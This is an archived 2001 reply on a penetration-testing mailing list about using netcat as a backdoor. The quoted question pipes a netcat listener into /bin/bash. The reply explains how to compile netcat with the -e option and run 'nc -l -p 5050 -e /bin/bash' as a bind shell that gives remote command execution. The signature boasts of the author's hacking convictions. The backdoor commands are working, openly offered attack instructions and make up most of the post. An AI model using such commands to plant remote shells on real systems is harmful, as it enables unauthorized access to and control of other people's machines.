Penetration Testing mailing list archives

Re: [PEN-TEST] nc backdooring

From: Cold Fire <coldfire () SHADY ORG>
Date: Thu, 25 Jan 2001 21:27:53 +0000

On Wed, Jan 24, 2001 at 10:52:19PM -0200, starlink wrote:

Hi, folks !

In one machine (the server - with root permission)  I typed:

nc -l -p 5050 | /bin/bash

In another machine (the client) I typed:

nc server_ip 5050

With this I could execute any program in the server.
Both machines are Red Hat Linux.

The question is: How can I can the output of the remote execution back? Is
there nicer way of doing this with netcat?


Compile netcat with -DGAPING_SECURITY_HOLE then:

nc -v -l -p 5050 -e '/bin/bash' on the server

and

nc -v <ip> 5050 on your box.

Steve

--
'Cold Fire, Britains most notorious hacker' Observer, July 1997
'The most recent conviction was that of [Cold Fire] whose On-line
escapades spanned from hacking into educational sites to more
sinister activities such as tapping into industrial and United
States military sites.' DC Paul Cox, SO6 Scotland Yard CCU

Current thread:

[PEN-TEST] nc backdooring starlink (Jan 25)
- Re: [PEN-TEST] nc backdooring Fyodor (Jan 25)
- Re: [PEN-TEST] nc backdooring Robert van der Meulen (Jan 25)
- Re: [PEN-TEST] nc backdooring Cold Fire (Jan 25)